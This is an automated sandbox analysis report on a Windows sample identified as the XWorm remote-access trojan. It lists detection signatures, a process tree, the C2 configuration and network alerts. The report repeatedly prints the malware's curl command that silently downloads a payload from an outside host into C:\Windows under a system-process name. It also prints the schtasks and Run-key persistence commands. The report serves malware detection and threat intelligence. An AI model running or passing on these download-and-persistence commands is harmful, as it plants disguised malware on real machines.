Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
18sFhgSyVK.exe

Overview

General Information

Sample name:18sFhgSyVK.exe
renamed because original name is a hash value
Original sample name:22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc.exe
Analysis ID:1561587
MD5:4e0d7812adef8e43e4eae77bf07dcc94
SHA1:2499fdf4c66070ec1b4d7c4e499f6dbc56565767
SHA256:22bbc82f84857c93f15ceb787da8ab57bd25aed0b32ef16124644231b1d142fc
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Uses curl to download other files
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 18sFhgSyVK.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\18sFhgSyVK.exe" MD5: 4E0D7812ADEF8E43E4EAE77BF07DCC94)
    • conhost.exe (PID: 2552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1768 cmdline: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 7092 cmdline: curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 6772 cmdline: C:\Windows\system32\cmd.exe /c color b MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5936 cmdline: C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • StartMenuExperienceHost.exe (PID: 1456 cmdline: C:\Windows\StartMenuExperienceHost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
        • schtasks.exe (PID: 2936 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6368 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6756 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5772 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5428 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7840 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7208 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 7432 cmdline: "C:\Users\user~1\AppData\Local\Temp\svchost.exe" MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 7588 cmdline: "C:\Users\user~1\AppData\Local\Temp\svchost.exe" MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 7668 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 8136 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 2324 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • svchost.exe (PID: 5860 cmdline: C:\Users\user~1\AppData\Local\Temp\svchost.exe MD5: 9D9D23A73F3B3F53E8581D8BB31953C4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "104.198.168.179"], "Port": 1337, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
    sslproxydump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x10ce2:$s6: VirtualBox
    • 0x10bfa:$s8: Win32_ComputerSystem
    • 0x13b51:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x13bee:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x13d03:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x12d55:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\Windows\StartMenuExperienceHost.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
        C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
          C:\Users\user\AppData\Local\Temp\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\Windows\StartMenuExperienceHost.exeJoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 5 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0xec8b:$s6: VirtualBox
                  • 0xebe9:$s8: Win32_ComputerSystem
                  • 0x117f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x11895:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x119aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x10b14:$cnc4: POST / HTTP/1.1
                  0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      Click to see the 3 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      12.0.StartMenuExperienceHost.exe.b30000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        12.0.StartMenuExperienceHost.exe.b30000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          12.0.StartMenuExperienceHost.exe.b30000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                            12.0.StartMenuExperienceHost.exe.b30000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                            • 0xee8b:$s6: VirtualBox
                            • 0xede9:$s8: Win32_ComputerSystem
                            • 0x119f8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                            • 0x11a95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                            • 0x11baa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                            • 0x10d14:$cnc4: POST / HTTP/1.1

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\StartMenuExperienceHost.exe, ProcessId: 1456, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
                            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\18sFhgSyVK.exe", ParentImage: C:\Users\user\Desktop\18sFhgSyVK.exe, ParentProcessId: 6400, ParentProcessName: 18sFhgSyVK.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, ProcessId: 1768, ProcessName: cmd.exe
                            Sigma detected: Invoke-Obfuscation VAR+ Launcher
                            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\18sFhgSyVK.exe", ParentImage: C:\Users\user\Desktop\18sFhgSyVK.exe, ParentProcessId: 6400, ParentProcessName: 18sFhgSyVK.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, ProcessId: 1768, ProcessName: cmd.exe
                            Sigma detected: New RUN Key Pointing to Suspicious Folder
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\StartMenuExperienceHost.exe, ProcessId: 1456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                            Sigma detected: Suspect Svchost Activity
                            Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user~1\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\svchost.exe, ProcessId: 7208, ProcessName: svchost.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\svchost.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\svchost.exe, ProcessId: 7208, ProcessName: svchost.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\StartMenuExperienceHost.exe, ProcessId: 1456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\StartMenuExperienceHost.exe, ProcessId: 1456, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\StartMenuExperienceHost.exe, ParentImage: C:\Windows\StartMenuExperienceHost.exe, ParentProcessId: 1456, ParentProcessName: StartMenuExperienceHost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", ProcessId: 2936, ProcessName: schtasks.exe
                            Sigma detected: Usage Of Web Request Commands And Cmdlets
                            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\18sFhgSyVK.exe", ParentImage: C:\Users\user\Desktop\18sFhgSyVK.exe, ParentProcessId: 6400, ParentProcessName: 18sFhgSyVK.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent, ProcessId: 1768, ProcessName: cmd.exe
                            Sigma detected: Use Short Name Path in Command Line
                            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\StartMenuExperienceHost.exe, ParentImage: C:\Windows\StartMenuExperienceHost.exe, ParentProcessId: 1456, ParentProcessName: StartMenuExperienceHost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", ProcessId: 2936, ProcessName: schtasks.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 6368, ProcessName: svchost.exe

                            Persistence and Installation Behavior

                            barindex
                            Sigma detected: Schedule system process
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\StartMenuExperienceHost.exe, ParentImage: C:\Windows\StartMenuExperienceHost.exe, ParentProcessId: 1456, ParentProcessName: StartMenuExperienceHost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe", ProcessId: 2936, ProcessName: schtasks.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-23T21:03:15.686107+010028536851A Network Trojan was detected192.168.2.749704149.154.167.220443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-11-23T21:03:31.666395+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:03:35.005493+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:03:44.735562+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:03:57.811744+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:05.021284+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:10.892727+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:23.967438+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:31.734513+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:32.653666+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:35.036903+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:36.981287+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:48.781948+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:49.282930+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:52.904777+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:54.388194+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:54.589383+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:54.690403+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:04:54.801517+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:00.363403+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:00.564582+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:00.640704+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:00.760385+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:03.840384+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:05.053094+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:07.107572+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:07.308687+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:09.514457+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:12.481178+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:12.682711+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:12.939275+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:14.950023+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:26.887003+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:31.641024+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:35.069157+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:38.640134+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:38.949523+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:39.250891+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:39.497896+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:39.978714+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:44.551660+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:49.594079+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:50.497744+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:50.698991+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:51.591338+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:05:55.751418+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:00.701370+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:00.902763+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:01.878874+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:02.489633+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:05.390110+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:15.391981+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:16.150188+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:16.362651+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:16.550015+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:29.187457+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:34.374193+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:35.084989+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:42.797190+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:44.827208+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:46.503446+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:51.522127+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:06:52.270009+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:07:00.928713+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:07:02.376681+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:07:03.202099+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:07:05.084425+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:07:08.592033+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            2024-11-23T21:07:11.747248+010028528701Malware Command and Control Activity Detected104.198.168.1791337192.168.2.749711TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
